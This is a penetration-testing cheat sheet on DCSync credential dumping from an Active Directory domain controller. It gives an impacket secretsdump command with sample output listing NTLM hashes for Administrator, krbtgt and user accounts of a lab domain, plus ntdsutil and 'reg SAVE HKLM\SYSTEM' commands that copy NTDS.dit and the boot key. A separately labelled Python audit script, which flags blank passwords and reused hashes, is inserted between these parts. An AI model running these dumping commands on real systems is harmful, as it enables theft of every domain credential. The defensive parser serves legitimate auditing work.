DCSync

DCSync - Automatic

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc DOMAIN/USER:'PASSWORD'@IP -use-vss


$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc EVILCORP/Administrator:'PASSWORD'@192.168.1.20 -use-vss

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0xe3c5303ac924ca2e4fc060bacf25efd3
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using smbexec method for remote execution
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ee1b7c0b536ce4f2b768a48470ce8c0f
[*] Reading and decrypting hashes from \\192.168.1.20\ADMIN$\Temp\WobZflyu.tmp 

EVILCORP.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a25ad8068476008880554449670a2bfb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC-1$:1000:aad3b435b51404eeaad3b435b51404ee:1dfb6297664a903fa25c459a31236bb2:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fa5fa8bd972719b46e335c07a2a87111:::
EVILCORP.local\mh_:1103:aad3b435b51404eeaad3b435b51404ee:e69c577da100da9d10a6b279b75764df:::
EVILCORP.local\kb_:1104:aad3b435b51404eeaad3b435b51404ee:e69c577da100da9d10a6b279b75764df:::
EVILCORP.local\geri.cooper:1105:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972:::
EVILCORP.local\jamie.white:1106:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972:::
EVILCORP.local\steve_jobs:1107:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972:::
EVILCORP.local\sarah.french:1108:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972:::
EVILCORP.local\sergiu.cosmescu:1109:aad3b435b51404eeaad3b435b51404ee:7fba703d0a92d2c84a610e6f74185972:::
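As an added audit example (not part of the original post and not impacket code): a small Python parser for the domain\uid:rid:lmhash:nthash lines printed above, run over constructed sample output, that flags what a defender reviews after an authorized dump like this one: blank passwords, LM hashes still being stored, and NT hashes shared by several accounts (password reuse, as with the 7fba703d... hash above). The LAB.local names, RIDs and hashes in SAMPLE are made up; the two constants are the well-known values for an empty LM and an empty NT password.

```python
import re
from collections import defaultdict

# One secretsdump line per account: domain\uid:rid:lmhash:nthash:::  (domain prefix is optional)
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM value stored when no LM hash is kept
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

def parse_dump(text):
    """Return one dict per well-formed credential line; [*] status lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["rid"] = int(entry["rid"])
            entries.append(entry)
    return entries

def audit(entries):
    """Flag blank passwords, stored LM hashes and NT hashes shared by several accounts."""
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings["blank_password"].append(e["user"])
        if e["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(e["user"])
        if not e["user"].endswith("$"):  # machine accounts have random passwords; skip them
            by_nt[e["nt"]].append(e["user"])
    findings["shared_nt_hash"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return findings

# Constructed sample output in secretsdump's format (LAB.local, RIDs and hashes are made up).
SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
LAB.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC-1$:1000:aad3b435b51404eeaad3b435b51404ee:d1d1d1d1d1d1d1d1d1d1d1d1d1d1d1d1:::
LAB.local\\alice:1103:aad3b435b51404eeaad3b435b51404ee:7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f:::
LAB.local\\bob:1104:0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b:7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f:::
"""

if __name__ == "__main__":
    for issue, hit in audit(parse_dump(SAMPLE)).items():
        print(f"{issue}: {hit}")
```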

Manual method - if we need to extract the NTDS.dit and the SYSTEM hive from a Windows machine ourselves (the hashes are then decrypted offline from these two files):

NTDS.dit (IFM copy via ntdsutil):
ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q

SYSTEM hive (holds the boot key needed to decrypt NTDS.dit):
reg SAVE HKLM\SYSTEM C:\extract\SYS
